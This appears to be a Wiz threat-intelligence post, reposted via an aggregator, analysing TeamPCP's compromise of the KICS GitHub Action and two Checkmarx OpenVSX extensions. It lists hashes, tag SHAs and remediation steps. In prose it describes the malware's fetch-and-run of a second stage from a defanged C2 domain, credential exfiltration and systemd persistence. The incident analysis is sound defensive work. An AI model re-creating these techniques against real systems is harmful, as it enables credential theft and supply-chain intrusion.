KICS GitHub Action Compromised: TeamPCP Strikes Again in Supply Chain Attack

wiz.io · blazarquasar · 7 days ago · view on HN · threat
0 net
Tags
kubernetes malware supply-chain
KICS GitHub Action Compromised: TeamPCP Supply Chain Attack | Wiz Blog Wiz Pricing Get a demo Get a demo The KICS GitHub Action was compromised with credential-stealing malware by TeamPCP, the same group behind the Trivy attack . KICS is an open source infrastructure as code security scanner by Checkmarx. Between 12:58 and 16:50 UTC on March 23rd , any users of this GitHub Action who were pinning to one of the compromised tags would have been served the malware. The repository was taken down at 16:50 UTC, shortly after a GitHub issue was filed by a user notifying the maintainers of the incident. The action was available at https://github.com/Checkmarx/kics-github-action prior to takedown. Update 19:24 UTC: The repository has been reinstated, and the maintainers state " The issue is resolved now ." Update 22:25 UTC: Sysdig reports that ast-github-action was also impacted. They were limited to observing a single malicious tag 2.3.28 - however based on TeamPCPs tactics, we believe it is likely all tags were impacted. Update 22:35 UTC: Based on a tip from independent researcher Adnan Khan, Wiz has confirmed that Checkmarx OpenVSX extensions cx-dev-assist 1.7.0 and ast-results 2.53.0 have been compromised . This was concurrently reported by ReversingLabs via tweet . See " OpenVSX Payload " section below for details. We have reported these to OpenVSX for removal. This is the second popular open source security scanner that this group has compromised in the last five days. The operation uses familiar naming conventions and the same RSA public key, allowing Wiz to assess with high confidence that it is the same actor. KICS Github Action Payload The malicious code was injected in the same manner as the Trivy incident: The attacker staged imposter commits (commits on a fork of the repository) containing their payload: setup.sh The attacker then used what appears to be a compromised identity to directly update all 35 tags in the project and point them to those staged commits The malware also functions similarly, but with a few key differences: This version uses a new C2 domain: checkmarx.zone . The new version creates a docs-tpcp repository via the victim's GITHUB_TOKEN s as a fallback to C2 disruption. In the Trivy incident, tpcp-docs was used instead. This version adds Kubernetes focused persistence code, in addition to the existing credential stealing and exfiltration code. While kics-github-action has ~1% of the visible public usage of trivy-action , it is still broadly adopted publicly and privately as an Infrastructure as Code security scanner. We will update this post with further analysis. Github Compromise The attack appears to have been accomplished via the compromise of the cx-plugins-releases (GitHub ID 225848595) service account, as that is the identity involved in publishing the malicious tags. OpenVSX Payload Both compromised extensions ( ast-results v2.53.0 and cx-dev-assist v1.7.0 ) contained identical payloads. They were published 12 seconds apart at 12:53 UTC on March 23, 2026, via the ast-phoenix account on Open VSX. The VS Code Marketplace versions appear unaffected. Payload Execution Flow On activation of the extension, the new malicious environmentAuthChecker.js is invoked from activateCore.js This payload first checks if the victim has credentials for at least one cloud provider Credential Gating within the payload If any credentials are detected, the second-stage payload is retrieved from the C2: checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz Retrieval of second stage from C2 The payload attempts execution via npx, bunx, pnpx, or yarn dlx. This covers major JavaScript package managers. The retrieved package contrains a comprehensive credential stealer. Harvested credentials are then encrpyted, using the keys as elsewhere in this campaign, and exfiltrated to checkmarx[.]zone/vsx as tpcp.tar.gz . scand() function hunting credentials On non-CI systems, the malware installs persistence via a systemd user service. The persistence script polls https://checkmarx[.]zone/raw every 50 minutes for additional payloads, with a kill switch that aborts if the response contains "youtube". Currently, the link redirects to The Show Must Go On by Queen. persist() persistence function Compromised Artifacts OpenVSX Extensions Artifact SHA256 ast-results-2.53.0.vsix 65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d cx-dev-assist-1.7.0.vsix 744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0 checkmarx-util-1.0.4.tgz 0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c environmentAuthChecker.js 527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90 kics-github-action Releases The v1.1 release was the only malicious release created. Other releases, triggered automatically by the tag events, failed because those versions already existed. kics-github-action Tags Tag, Commit SHA v1,0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1 v1.0,45f3749467a6017cb4fb749054b498d149dd5924 v1.1,8e20c7a67bb95632e2040327a355fb97e6014d29 v1.2,93de85c910d859b759cf9185aa78d5a23a4b7000 v1.3,0e7343ba084735863db92b6f8ba2fa9dee604f7c v1.4,2dc0fa613f6f4c15f26ad98225ad253475681616 v1.5,f00191dd3352c0cd83c6cce4e6bf04b628214dd0 v1.6,e0359b1a253ee66c8018586c3225e6e9cd2d8a4f v1.6.1,dc6dbf358998c0c64da83edc8fcd581c12656b19 v1.6.2,08b9ea97eb292d5e1f9ac2d8e21c0ba32f0fdff0 v1.6.3,005fb0837553de722f8bf11d98e905dbdde19861 v1.7.0,a5471d37c656ecd4560e8e0b3977910f27025618 v2,3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4 v2.0.0,121c38fb49c9fc82160245fb6e2a9119db636e4d v2.1.0,1e9eeaba37fe0032deba133f598e74dab0ceb3b7 v2.1.1,c5c07508527fc6a125855eebfb533e64f675bd8e v2.1.2,c999dbb9cc904e23675f9929f7e0e51d132879cf v2.1.3,4ebf62dd8ff318412b38d19841fc3c8650e294bf v2.1.4,3ae9f0d6f8139964635d411149f9b3e0a6eb935e v2.1.5,96a0e8eb31c3cce6c495c9a49dd49c881cd17934 v2.1.6,31fbf5831a2e52429738fdc0cbaa20e57872b6fc v2.1.7,fca3a20afcb8ec7f9932c060a236d2a9021fdd2b v2.1.8,0f81f132f9f09bb4976d403914a44a1a1eb6158d v2.1.9,c0e23718a5074f3b8ad286f37b532e02057af35f v2.1.10,d66f0657133bc42f8264458063999bf1910490db v2.1.11,e35c9d6a5faffc1c5b3450d0bf09006aa9b9e906 v2.1.12,2eee333d70fb6e14ce1d4aa73f12058bc5d70193 v2.1.13,f9641eb512f5c6530d13275903e8a97baf0925f1 v2.1.14,e8754eebc822b5122e96a6142b28dbc0e179c91c v2.1.15,69b3f020390222a9fcb6029ba56533b2fb12f103 v2.1.16,db942a0dd7e9d1aeac72bc675bdb67f39a688b63 v2.1.17,208813bf5feca5df9a935363cd426bc914614d0b v2.1.18,3fdeadb81fbeddc1453163cc87bc173911fd47e2 v2.1.19,310734c0ffd29438f6195a24e2cbbacfdc33c9ab v2.1.20,b974e53df1e3a2cd22ea90f0ec01882394feede4 Which actions should security teams take? Audit KICS GitHub Actions references : Review workflows using kics-github-action . If you referenced a version tag rather than a SHA, check workflow run logs from the exposure window for signs of compromise. Search for exfiltration artifacts : Look for repositories named docs-tpcp in your GitHub organization, which may indicate successful exfiltration via the fallback mechanism. Long-term hardening : Refer to Wiz's How to Harden GitHub Actions: The Unofficial Guide How can Wiz help? Wiz customers should continue to monitor the advisory in the Wiz Threat Center for ongoing guidance, pre-built queries, and references to relevant detections they can use to assess the risk in their environment. Worried you’ve been impacted? Connect with the Wiz Incident Response team . Tags # Research # Threat Intel Table of contents KICS Github Action Payload OpenVSX Payload Compromised Artifacts OpenVSX Extensions kics-github-action Releases kics-github-action Tags Which actions should security teams take? How can Wiz help? Continue reading Introducing the Wiz Red Agent- AI-Powered Attacker Gal Nagli , Mika Maymon , Guy Goldenberg , Bar Vaserman March 23, 2026 Red Agent is an AI-powered, context-aware attacker that uncovers complex exploitable risks across your entire attack surface, continuously and at scale. Introducing Wiz AI Application Protection Platform (AI-APP) Snegha Ramnarayanan , Aviel Erdis , Guy Weiss , Dan Segev March 23, 2026 Secure every layer of AI applications — infrastructure, data, access, models, agents, and applications — from code to runtime, across every environment you build in. Introducing Wiz Agents & Workflows: Security at the Speed of AI Snegha Ramnarayanan , Bandhna Bedi , Guy Mast , Nati Beeri March 23, 2026 A new security operating model powered by AI agents that removes bottlenecks and enables teams to act at the speed of AI Get a personalized demo Ready to see Wiz in action? "Best User Experience I have ever seen, provides full visibility to cloud workloads." David Estlick CISO "Wiz provides a single pane of glass to see what is going on in our cloud environments." Adam Fletcher Chief Security Officer "We know that if Wiz identifies something as critical, it actually is." Greg Poniatowski Head of Threat and Vulnerability Management Get a demo
← Back to stories